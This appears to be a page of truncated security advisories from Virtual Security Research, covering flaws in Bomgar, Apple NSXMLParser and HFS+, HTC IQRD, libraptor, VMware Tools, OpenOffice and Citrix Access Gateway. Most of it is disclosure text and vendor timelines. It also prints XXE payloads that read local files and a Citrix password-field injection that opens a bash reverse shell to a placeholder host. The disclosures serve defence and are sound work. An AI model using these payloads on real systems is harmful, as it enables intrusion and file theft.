Bomgar Remote Support - Local Privilege Escalation (CVE-2017-5996)
Virtual Security Research, LLC. https://www.vsecurity.com/ Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: Bomgar Remote Support - Local Privilege Escalation Release Date: 2017-10-26 Application: Bomgar Remote Support Versions: 15.2.x before 15.2.3 16.1.x before 16.1.5 16.2.x before 16.2.4 Severity: High/Medium Author: Robert Wessen Author: Mitch Kucia Vendor Status: Update Released [2] CVE Candidate: CVE-2017-5996 Reference: https://www.vsecurity.com/download/advisories/20171026-1.txt =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Product Description ~-~ From Bomgar's website [1]: "The fastest, most secure way for experts to access and support the systems that need them." Vulnerability Overview ~~ In mid-January, VSR identified a privilege escalation vulnerability in Bomgar Remote Support application which can be used to escalate from any unprivileged user to nt authority/system on Microsoft Windows 7 systems. The vulnerability originates from an nt authority/system service being executed from a folder with excessive permissions. The exploit requires a remote support agent to log into the affected system. Vulnerability Details ~---~ The Bomgar Remote Support agent enables remote support personnel to establish screen sharing, access command shell, and perform system administration tasks on machines with the agent installed. The agent, by default, creates a service as the Windows LocalSystem account and creates a folder at C:\ProgramData\bomgar-ssc-0x (where each h is a hex character). The agent is also executed from this folder, so the folder is included in the Windows dynamic library loader search path. The default permissions on the C:\ProgramData folder allow all users, even unprivileged ones, to append and write files. These permissions are inherited by sub-directories unless explicitly overridden. These permissions are not changed during the installation of the agent, so a DLL planting/hijack is possible. A Trojan horse with the same name as one of the requested, but not present libraries can be placed inside the C:\ProgramData\bomgar-ssc-0x folder since this folder is writeable by all users. When a remote support person attempts to connect to the host, the malicious library will be loaded and code can executed as nt authority/system. Versions Affected ~---~ The issue was originally discovered in version 16.1.1, although it likely exists since at least version 14. All testing was performed exclusively on Windows 7, however the vulnerability is suspected to be present on all supported Windows platforms. Vendor Response ~-~ The following timeline details Bomgar's response to the reported issue: 2017-02-05 VSR contacted Bomgar via several public email addresses to file a security report. 2017-02-06 Bomgar replied, VSR provided additional details on the vulnerability and Bomgar began internal triage. 2017-02-13 Bomgar confirmed reproduction and indicated a hotfix will be available to select customers on 2017-02-17. Patch for all customers will be available at a later date. 2017-03-28 Bomgar releases patch in Remote Support versions 15.2.3 [2], 16.1.5 [3], and 16.2.4 [4]. 2017-10-26 VSR advisory released. Recommendation ~~ Upgrade all client installs to the latest version of Bomgar Remote Support software as soon as possible. Common Vulnerabilities and Exposures (CVE) Information ~~ The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2017-5996 to this issue. This is a candidate for inclusion in the CVE list (https://cve.mitre.org), which standardizes names for security problems. Acknowledgments ~--~ Thanks to the Bomgar development team for a prompt response, confirmation, and patch. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= References: 1. https://www.bomgar.com/ 2. https://www.bomgar.com/support/changelog/remote-support-15-2-3 3. https://www.bomgar.com/support/changelog/remote-support-16-1-5 4. https://www.bomgar.com/support/changelog/remote-support-1624 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising
Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. See the VSR disclosure policy for more information on our responsible disclosure practices: http://www.vsecurity.com/company/disclosure =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Copyright 2014 Virtual Security Research, LLC. All rights reserved. signature.asc Description: Message signed with OpenPGP using GPGMail
Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
VSR Security Advisory
http://www.vsecurity.com/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Advisory Name: Apple Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
Release Date: 2014-09-17
Application: Apple iOS Foundation Framework
Apple OS X Foundation Framework
Versions: iOS 7.0, 7.1, OS X 10.9 - 10.9.4
Severity: High
Author: George D. Gal ggal (at) vsecurity.com
Vendor Status: Fix Available
CVE Candidate: CVE-2014-4374
Reference: http://www.vsecurity.com/resources/advisory/20140917-1/
http://support.apple.com/kb/HT1222
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Product Description
~-~
- From [1]:
Xcode includes software development kits (SDKs) that enable you to create
applications that run on specific versions of iOS or OS X?including
versions different from the one you are developing on. This technology
lets you build a single binary that takes advantage of new features when
running on a system that supports them, and gracefully degrades when
running on an older system. Some Apple frameworks automatically modify
their behavior based on the SDK an application is built against for
improved compatibility.
Vulnerability Overview
~~
In May 2014, VSR identified a vulnerability in versions 7.0 and 7.1 of
the iOS
SDK whereby the NSXMLParser class, resolves XML External Entities by default
despite documentation which indicates otherwise. In addition, settings to
change the behavior of XML External Entity resolution appears to be
non-functional.
This vulnerability, commonly known as XXE (XML eXternal Entities) attacks
could allow for an attacker's ability to use the XML parser to carry out
attacks ranging from network port scanning, information disclosure,
denial of service, and potentially to carry out remote file retrieval.
Further review also revealed that the Foundation Framework used in OS X
10.9.x is also vulnerable.
The severity of this vulnerability varies. For example, in situations where
the application does not reflect user influenced XML, retrieval of files
may be limited, however using external HTTP entities could be used to
conduct port scans. In other scenarios if core iOS applications transmit XML
over plaintext protocols, these protocols could potentially be intercepted
to leak contents of any file on the mobile device. For App Store
applications
files which could be accessed may be limited to those under the individual
chrooted application directories, or in the case of jailbroken devices, any
file on the filesystem.
Vulnerability Details
~---~
Apple's NSXMLParser documentation [2] indicates that external entity
resolution is disabled in the parser by default. However, inspection of
multiple applications running on iOS 7.0 and 7.1 now appear to resolve
external entities by default, and even when attempting to disable entity
resolution explicitly as shown below:
[nsXmlParser setShouldResolveExternalEntities:NO];
The following source code demonstrates the flaw:
- - (void) doParse:(NSData *)data {
// create and init NSXMLParser object
NSXMLParser *nsXmlParser = [[NSXMLParser alloc] initWithData:data];
// Why does the following not even work!?
[nsXmlParser setShouldResolveExternalEntities:NO];
// create and init our delegate
VSRParser *parser = [[VSRParser alloc] initXMLParser];
// set delegate
[nsXmlParser setDelegate:parser];
// parsing...
BOOL success = [nsXmlParser parse];
// test the result
if (success) {
NSLog(@No errors);
NSMutableArray *stuff = [parser tests];
} else {
NSLog(@Error parsing document!);
}
[parser release];
[nsXmlParser release];
}
When using a vulnerable input XML file as shown below, the XML parser
attempts
to perform network name resolution and access the resource defined by http;
?xml version=1.0 encoding=UTF-8?
!DOCTYPE roottag [
!ENTITY http SYSTEM http://iossdk-xxe.apt.vsecurity.org/;
!ENTITY file SYSTEM file:///etc/hosts
]
test
vsr
tag1file;/tag1
tag2http;/tag2
/vsr
/test
The following DNS and web server log entries demonstrate attempts to resolve
http;
2014-05-19_13:26:28.31088 ... iossdk-xxe.apt.vsecurity.org
XX.XX.XX.XX - - [19/May/2014:09:26:28 -0400] GET /xxe HTTP/1.0 404 446
- -
In more serious exploitation scenarios, plaintext XML communications between
a server and iOS mobile application, or OS X client application could be
intercepted and modified in transit to reference a file present on the
client
device. If the device reflects this value in subsequent communications or
errors the contents of files stored on the device could be leaked to an
attacker
Versions Affected
~---~
HTC IQRD Android Permission Leakage (CVE-2012-2217)
VSR Security Advisory http://www.vsecurity.com/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: HTC IQRD Android Permission Leakage Release Date: 2012-04-20 Application: IQRD on HTC Android Phones Author: Dan Rosenberg drosenberg (at) vsecurity.com Vendor Status: Patch Released CVE Candidate: CVE-2012-2217 Reference: http://www.vsecurity.com/resources/advisory/20120420-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- The IQRD service is HTC's implementation of a Carrier IQ porting layer on several HTC Android phones. Carrier IQ is a data collection framework that may be deeply integrated into the Android application stack in order to provide cell carriers with detailed metrics data on device and network activity [1]. To complete the integration of Carrier IQ on a specific device, phone manufacturers provide a porting layer that allows the Carrier IQ service to perform specific actions that may vary by device. Vulnerability Details - On December 22th, VSR identified a vulnerability in IQRD. The IQRD service listens locally on a TCP socket bound to port 2479. This socket is intended to allow the Carrier IQ service to request device-specific functionality from IQRD. Unfortunately, there is no restriction or validation on which applications may request services using this socket. As a result, any application with the android.permission.INTERNET permission may connect to this socket and send specially crafted messages in order to perform potentially malicious actions. In particular, it is possible for malicious applications to: 1. Trigger UI popup messages 2. Generate tones 3. Send arbitrary outbound SMS messages that do not appear in a user's outbox, facilitating toll fraud 4. Retrieve a user's Network Access Identifier (NAI) and corresponding password, potentially allowing rogue devices to impersonate the user on a CDMA network Versions Affected - The issue is confirmed to affect the HTC EVO 4G, HTC EVO Design 4G, EVO Shift 4G, HTC EVO 3D, HTC EVO View 4G, and HTC Hero on Sprint; and the HTC Vivid on ATT. Vendor Response --- The following timeline details HTC's response to the reported issue: 2011-12-22Vulnerability reported to HTC 2011-12-28HTC confirms receipt, replies that fix is planned for early 2012 2012-03-10VSR requests status update 2012-03-16HTC confirms fix has been published 2012-03-26HTC requests clarification on finding 2012-03-26VSR provides clarification on finding, requests confirmation on status of fix 2012-04-02HTC provides confirmation of fix, requests further clarification 2012-04-02VSR provides clarification on finding 2012-04-12VSR provides draft advisory to HTC 2012-04-13HTC provides corrections to advisory, requests disclosure date 2012-04-20Coordinated disclosure Recommendation -- HTC has issued a fix that will typically be provided as an OTA update by affected cell carriers. If the update has not automatically been installed, it is possible to retrieve the update manually by navigating to Menu - Settings - System Updates - HTC Software Update - Check Now. The following software versions on Sprint are confirmed to resolve this issue: HTC EVO 4G: 4.67.651.3 HTC EVO Design 4G: 2.12.651.5 HTC EVO Shift 4G: 2.77.651.3 HTC EVO 3D: 2.17.651.5 HTC EVO View 4G:2.23.651.1 The following software versions on ATT are confirmed to resolve this issue: HTC Vivid: 3.26.502.56 All affected devices except the HTC Hero have received an over-the-air update. HTC and Sprint have declined to update the HTC Hero, citing its 2009 release, minimal current usage, and lack of malicious applications in the Android Marketplace exploiting this vulnerability. Users should be aware that devices that no longer receive updates due to switching carriers may remain vulnerable. Common Vulnerabilities and Exposures (CVE) Information -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2012-2217 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements Thanks to HTC for their response and fix. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Carrier IQ http://www.carrieriq.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied
CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
VSR Security Advisory
http://www.vsecurity.com/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Advisory Name: libraptor - XXE in RDF/XML File Interpretation
Release Date: 2012-03-24
Applications: libraptor / librdf (versions 1.x and 2.x)
Also Affected: OpenOffice 3.x, LibreOffice 3.x, AbiWord, KOffice
Author: tmorgan {a} vsecurity * com
Vendor Status: Patches available; major downstream vendors
and operating system distributions notified
CVE Candidate: CVE-2012-0037
Reference: http://www.vsecurity.com/resources/advisory/20120324-1/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Product Description
~-~
Raptor is a free software / Open Source C library that provides a set of
parsers and serializers that generate Resource Description Framework (RDF)
triples by parsing syntaxes or serialize the triples into a syntax. The
supported parsing syntaxes are RDF/XML, N-Quads, N-Triples, TRiG, Turtle, RSS
tag soup including all versions of RSS, Atom 1.0 and 0.3, GRDDL and
microformats for HTML, XHTML and XML and RDFa. The serializing syntaxes are
RDF/XML (regular, and abbreviated), Atom 1.0, GraphViz, JSON, N-Quads,
N-Triples, RSS 1.0 and XMP. -- libraptor web site [1]
libraptor is a component of librdf[2] which is used by a variety of open source
software to interpret Resource Description Framework (RDF) [3] formats.
Vulnerability Overview
~~
In December 2011, VSR identified a vulnerability in multiple open source office
products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe
interpretation of XML files with custom entity declarations. Deeper analysis
revealed that the vulnerability was caused by acceptance of external entities by
the libraptor library, which is used by librdf and is in turn used by these
office products.
In the context of office applications, these vulnerabilities could allow for XML
External Entity (XXE) attacks resulting in file theft and a loss of user privacy
when opening potentially malicious ODF documents. For other applications which
depend on librdf or libraptor, potentially serious consequences could result
from accepting RDF/XML content from untrusted sources, though the impact may
vary widely depending on the context.
Vulnerability Details
~---~
Open Document Format (ODF) files consist of a collection of several different
files stored in a ZIP archive. Included in this set is a manifest.rdf file
which is formatted according to the RDF/XML representation. The RDF format is
intended to be used for storing metadata associated with specific document
elements. The manifest.rdf file can reference secondary RDF files within the
ODF file as well as external document schemas.
The RDF file parser (librdf) used by the affected office products allows DTD
specifications within the RDF files themselves. In addition, the parser
interprets external entities which may reference arbitrary external files, HTTP
and FTP resources.
For instance, the following evil.rdf file was created within a valid ODF text
archive (.odt file) which was referenced by the internal manifest.rdf file:
?xml version=1.0 encoding=utf-8?
!DOCTYPE rdf [
!ENTITY file SYSTEM file:///c:/windows/win.ini
]
rdf:RDF xmlns:rdf=http://www.w3.org/1999/02/22-rdf-syntax-ns#;
rdf:Description rdf:about=content.xml#id1265690860
ns0:comment
xmlns:ns0=http://www.w3.org/2000/01/rdf-schema#;file;/ns0:comment
/rdf:Description
/rdf:RDF
Upon opening the malicious .odt file in OpenOffice for Windows, the
c:\windows\win.ini file was read and included in the document metadata. Upon
saving the document, this metadata was included literally in the resulting
evil.rdf file (within the .odt):
?xml version=1.0 encoding=utf-8?
rdf:RDF xmlns:rdf=http://www.w3.org/1999/02/22-rdf-syntax-ns#;
rdf:Description rdf:about=content.xml#id1265690860
ns1:comment xmlns:ns1=http://www.w3.org/2000/01/rdf-schema#;; for
16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
/ns1:comment
/rdf:Description
/rdf:RDF
The malicious XML entities could also include URLs to attacker-controlled
HTTP or FTP resources. This would allow an attacker to determine when a
document was opened, potentially resulting in reduced privacy. However, based
on current analysis of the affected office applications, the most serious attack
scenario is likely to be:
1. Attacker posts a malicious file on a web site or sends file to victim. The
file contains a form for the victim to fill out and return to the attacker.
2. Victim fills out the form, saves it, sends it back to the attacker.
3. Attacker is able to read the contents of any stolen files as embedded
metadata, simply by unzipping the
VMware Tools Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: VMware Tools Multiple Vulnerabilities Release Date: 2011-06-03 Application: VMware Guest Tools Severity: High Author: Dan Rosenberg drosenberg (at) vsecurity.com Vendor Status: Patch Released [2] CVE Candidate: CVE-2011-1787, CVE-2011-2145, CVE-2011-2146 Reference: http://www.vsecurity.com/resources/advisory/20110603-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: VMware Tools is a suite of utilities that enhances the performance of the virtual machine's guest operating system and improves management of the virtual machine. Without VMware Tools installed in your guest operating system, guest performance lacks important functionality. Vulnerability Overview - -- On February 17th, VSR identified multiple vulnerabilities in VMware Tools, a suite of utilities shipped by VMware with multiple product offerings, as well as by open-source distributions as the open-vm-tools package. The first of these issues results in a minor information disclosure vulnerability, while the second two issues may result in privilege escalation in a VMware guest with VMware Tools installed. Product Background - -- VMware Tools includes mount.vmhgfs, a setuid-root utility that allows unprivileged users in a guest VM to mount HGFS shared folders. Also shipped with VMware Tools is vmware-user-suid-wrapper, a setuid-root utility which handles initial setup to prepare for running vmware-user, which grants users access to other utilities included with VMware Tools. Vulnerability Details - - CVE-2011-2146: The mount.vmhgfs utility makes a call to stat() to check for the existence and type (file, directory, etc.) of the user-supplied mountpoint, and provides an error message if the provided argument does not exist or is not a directory. Because mount.vmhgfs is setuid-root, a local attacker can leverage this behavior to identify if a given path exists in the guest operating system and whether it is a file or directory, potentially violating directory permissions. CVE-2011-1787: The mount.vmhgfs utility checks that the user-provided mountpoint is owned by the user attempting to mount an HGFS share prior to performing the mount. However, a race condition exists between the time this checking is performed and when the mount is performed. Successful exploitation allows a local attacker to mount HGFS shares over arbitrary, potentially root-owned directories, subsequently allowing privilege escalation within the guest. CVE-2011-2145: The vmware-user-suid-wrapper utility attempts to create a directory at /tmp/VMwareDnD. Next, it makes calls to chown() and chmod() to make this directory root-owned and world-writable. By placing a symbolic link at the location of this directory, vmware-user-suid-wrapper will cause the symbolic link target to become world-writable, allowing local attackers to escalate privileges within the guest. Only FreeBSD and Solaris versions of VMware Tools are affected. Versions Affected - - VMware's advisory [2] indicates the following product versions are affected: VMware Product Running Replace with/ Product Version on Apply Patch = === = vCenter any Windows not affected Workstation 7.1.x Linux 7.1.4 or later* Workstation 7.1.x Windows 7.1.4 or later* Player 3.1.x Linux 3.1.4 or later* Player 3.1.x Windows 3.1.4 or later* AMS any any not affected Fusion 3.1.x OSX Fusion 3.1.3 or later* ESXi4.1 ESXiESXi410-201104402-BG* ESXi4.0 ESXiESXi400-201104402-BG* ESXi3.5 ESXiESXe350-201105402-T-SG* ESX 4.1 ESX ESX410-201104401-SG* ESX 4.0 ESX ESX400-201104401-SG* ESX 3.5 ESX ESX350-201105406-SG* ESX 3.0.3 ESX not affected The open-vm-tools package prior to version 2011.02.23-368700 is also affected. Vendor Response - --- The following timeline details VMware's response to the reported issue: 2011-02-17VMware receives initial vulnerability report 2011-02-17VMware security team acknowledges receipt 2011-03-04VMware provides status update 2011-03-04VSR initiates discussion of disclosure date 2011-03-10VMware responds, indicates internal coordination underway 2011-03-11VSR
Apple HFS+ Information Disclosure Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Apple HFS+ Information Disclosure Vulnerability Release Date: 2011-03-22 Application: Apple OS X kernel (XNU) Versions: All versions = xnu-1504.7.4 Severity: Medium Author: Dan Rosenberg drosenberg (at) vsecurity (dot) com Vendor Status: Patch Released [2] CVE Candidate: CVE-2011-0180 Reference: http://www.vsecurity.com/resources/advisory/20110322-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: Beneath the appealing, easy-to-use interface of Mac OS X is a rock-solid, UNIX-based foundation that is engineered for stability, reliability, and performance. The kernel environment is built on top of Mach 3.0 and provides high-performance networking facilities and support for multiple, integrated file systems. Vulnerability Overview - -- On June 30th, VSR identified a vulnerability in HFS+, a filesystem implemented in the OS X XNU kernel. HFS+ is the default filesystem in use on many installations of the Mac OS X operating system. By exploiting this vulnerability, an unprivileged user with local access to a machine using HFS+ may be able to read raw filesystem data, bypassing file permissions and resulting in information disclosure. Vulnerability Details - - Users may interact with the filesystem using the standard ioctl interface. HFS+ features an ioctl called F_READBOOTSTRAP that allows unprivileged users to read raw data from an HFS+ filesystem. The ioctl intends to ensure that this data is restricted to the first 1024 bytes, where bootstrap information is stored. However, due to an integer overflow in the code that attempts to enforce this restriction, it is possible for an unprivileged user to use this ioctl to read large portions of filesystem data outside of this byte range, leading to an information disclosure vulnerability. The vulnerable check reads as follows, in bsd/hfs/hfs_readwrite.c: if (user_bootstrapp-fbt_offset + user_bootstrapp-fbt_length 1024) return EINVAL; If a user provides values for the fbt_offset and fbt_length members such that their sum overflows and wraps around to an integer less than 1024, portions of filesystem data outside the intended range will be read and returned to the user. Proof-of-Concept Exploit - VSR has developed a proof-of-concept exploit [3] to both demonstrate the severity of this issue as well as allow users and administrators to verify the existence of the vulnerability. The exploit leverages the integer overflow to read arbitrary amounts of filesystem data at a negative offset from the end of the filesystem. Versions Affected - - Testing was performed on Darwin Kernel Version 10.4.0, xnu-1504.7.4~1, but review of older source code suggests that all versions of OS X may be affected. Vendor Response - --- The following timeline details Apple's response to the reported issue: 2010-07-01Apple was provided a draft advisory 2010-07-02Apple acknowledges receipt of advisory 2010-07-22Request for confirmation of issue 2010-07-25Apple confirms issue under investigation 2010-09-02Request for status update 2010-09-02Apple confirms fix is being tested 2010-10-13Request for status update 2010-10-14Apple confirms fix is planned for undetermined date 2010-11-16Request for status update 2010-11-16Apple confirms ship date is set for early 2011 2011-01-18Request for status update 2011-01-18Apple confirms ship date for early April 2011-03-21Apple publishes fix Apple's advisory may be obtained at: http://support.apple.com/kb/HT4581 Recommendation - -- Apply the fix provided by Apple's OS X security update [2]. Common Vulnerabilities and Exposures (CVE) Information - -- The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2011-0180 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Darwin and Core Technologies http://developer.apple.com/mac/library/documentation/MacOSX/Conceptual/OSX_Technology_Overview/SystemTechnology/SystemTechnology.html 2. Apple Security Update 2011-001 http://support.apple.com/kb/HT4581 3. HFS+ F_READBOOTSTRAP information disclosure exploit http://www.vsecurity.com/download/tools/hfs-dump.c - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This advisory is distributed for educational
OpenOffice.org Multiple Memory Corruption Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: OpenOffice.org Multiple Memory Corruption Vulnerabilities Release Date: 2011-01-26 Application: Oracle OpenOffice.org Versions: 3.2 and earlier Severity: High Author: Dan Rosenberg drosenberg (at) vsecurity.com Vendor Status: Patch Released CVE Candidates: CVE-2010-3451, CVE-2010-3452, CVE-2010-3453, CVE-2010-3454 Reference: http://www.vsecurity.com/resources/advisory/20110126-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: OpenOffice.org 3 is the leading open-source office software suite for word processing, spreadsheets, presentations, graphics, databases and more. It is available in many languages and works on all common computers. It stores all your data in an international open standard format and can also read and write files from other common office software packages. It can be downloaded and used completely free of charge for any purpose. Vulnerability Overview - -- On August 20th, VSR identified multiple memory corruption vulnerabilities in OpenOffice.org. By convincing a victim to open a maliciously crafted RTF or Word document, arbitrary code may be executed on the victim's machine. Vulnerability Details - - CVE-2010-3451: OpenOffice.org uses its own internal memory management system for parsing tables in RTF documents. Information about each table row is inserted, element by element, into an SwTableBoxes object. These objects contain a fixed amount of data, and when they have reached capacity, a resize() method is called to double the space previously allocated for cell contents. When this method is called, the new space will be allocated on top of recently freed memory containing file data without clearing this memory. Because of a bug in the RTF parser, corrupt table data may cause the insertion of elements into an SwTableBoxes object to skip an index rather than remaining strictly sequential. When this occurs, the nA field, representing the number of data elements used in the object, will be out-of-sync with the index of the most recently inserted element, allowing exploitation of a use-after-free vulnerability. To exploit this issue, corrupt RTF table data first causes the nA field to become out-of-sync with the index of the most recently inserted element in an SwTableBoxes object. Next, the resize() method is called when the object reaches capacity, resulting in its data being reallocated on top of attacker-controlled memory. Finally, during the parsing of an RTF_ROW token, the nA field is used to index into the SwTableBoxes cell data in an attempt to retrieve the most recently added object. Because this index is out-of-sync and the data was recently moved on top of previously used memory, this will result in retrieving an attacker-controlled object from the heap. Subsequent usage of this object may allow an attacker to control program flow and execute arbitrary code. CVE-2010-3452: Due to a signedness error in parsing the \pnseclvl RTF tag, which is used for multi-level lists, it is possible to trigger a use-after-free vulnerability. When this tag is followed by an unexpected character, its token value may be negative. The parser attempts to restrict this value to less than the MAXLEVEL constant, but since a signed comparison is used, a negative value will pass this check. This value is then used as an index to retrieve an SwNumFmt object from an array on the heap. By manipulating the heap, it is possible to cause the retrieval of an attacker-controlled object. Subsequent usage of this object may allow an attacker to control program flow and execute arbitrary code. CVE-2010-3453: When processing override level numbers in parsing list data for Word documents, a user-controlled value is used to index into a vector for an assignment without checking that this index is less than the size of the vector. As a result, an attacker-controlled object may be written to a location on the heap past the bounds of the vector, potentially allowing arbitrary code execution. CVE-2010-3454: When parsing Word documents, two signed short values are read directly from the document file to determine where to place NULL terminators after copying additional data in. Because these indexes are not checked in any way, an attacker may use this to write NULL bytes to two arbitrary locations in memory, potentially allowing arbitrary code execution. Versions Affected - - Versions prior to OpenOffice.org 3.3 are affected. Vendor Response - --- The following timeline details OpenOffice.org's response to the reported issues: 2010-08-20Initial
VSR Advisories: Citrix Access Gateway Command Injection Vulnerability
VSR Security Advisory http://www.vsecurity.com/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Citrix Access Gateway Command Injection Vulnerability Release Date: 2010-12-21 Application: Citrix Access Gateway Versions: Access Gateway Enterprise Edition (up to 9.2-49.8) Access Gateway Standard Advanced Edition (prior to 5.0) Severity: High Author: George D. Gal ggal (at) vsecurity (dot) com Vendor Status: Updated Software Released, NT4 Authentication Removed [2] CVE Candidate: CVE-2010-4566 Reference: http://www.vsecurity.com/resources/advisory/20101221-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- From [1]: Citrix(R) Access Gateway(TM) is a secure application access solution that provides administrators granular application-level control while empowering users with remote access from anywhere. It gives IT administrators a single point to manage access control and limit actions within sessions based on both user identity and the endpoint device, providing better application security, data protection, and compliance management. Vulnerability Overview -- On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within the way user authentication credentials are handled. Under certain configuration settings it appears that user credentials are passed as arguments to a command line program to authenticate the user. A lack of data validation and the mechanism in which the external program is spawned results in the potential for command injection and arbitrary command execution on the Access Gateway. Vulnerability Details - The Citrix Access Gateway provides support for multiple authentication types. When utilizing the external legacy NTLM authentication module known as ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password. By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway. The following commands are executed by the ntlm_authenticator during this process: vpnadmin 10130 0.0 0.0 2104 976 ?S15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U username%password -p 139 -S xxx.xxx.xxx.xxx /tmp/samedit-samuser-stdout.50474096 2 /dev/null vpnadmin 10131 0.0 0.1 3852 1528 ?S15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U username% -p 139 -S xxx.xxx.xxx.xxx By submitting a password value as shown below, it is possible to establish a reverse shell to a netcat listener: | bash -i /dev/tcp/HOST/PORT 01 Using a simple ping command in the password field an attacker could use timing attacks to verify the presence of the vulnerability: | ping -c 10 HOST The ping command above will attempt to send 10 ICMP echo requests to the target host, resulting in a noticable delay easily detected by vulnerability scanners. Versions Affected - Testing was performed against a Citrix Access Gateway 2000 version 4.5.7. According to the vendor this vulnerability affects all versions of Access Gateway Enterprise Edition up to version 9.2-49.8, and all versions of the Access Gateway Standard and Advanced Editions prior to Access Gateway 5.0. Vendor Response --- The following timeline details the vendor's response to the reported issue: 2010-08-06Citrix was provided a draft advisory. 2010-08-10Citrix acknowledged receipt of draft advisory. 2010-08-16VSR follow-up to determine confirmation of issue. 2010-08-16Citrix confirmed issue. 2010-09-14VSR follow-up to determine status of issue. 2010-09-29VSR follow-up to determine status of issue. 